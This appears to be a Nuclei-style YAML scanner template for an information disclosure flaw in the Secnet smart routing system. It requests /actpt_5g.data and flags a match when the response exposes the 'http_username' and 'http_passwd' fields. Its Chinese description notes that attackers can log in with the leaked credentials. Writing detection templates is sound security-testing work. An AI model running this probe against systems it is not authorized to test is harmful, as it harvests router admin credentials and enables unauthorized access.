http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - http_username
            - http_passwd
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /actpt_5g.data HTTP/1.1
          Host: {{Hostname}}
id: Secnet-Information-disclosure
info:
    author: Superhero
    description: Secnet-智能路由系统actpt_5g.data信息泄露，攻击者可利用泄露的账号密码登录系统
    name: Secnet-智能路由系统 actpt_5g.data信息泄露
    severity: medium
    tags:
        - Information disclosure
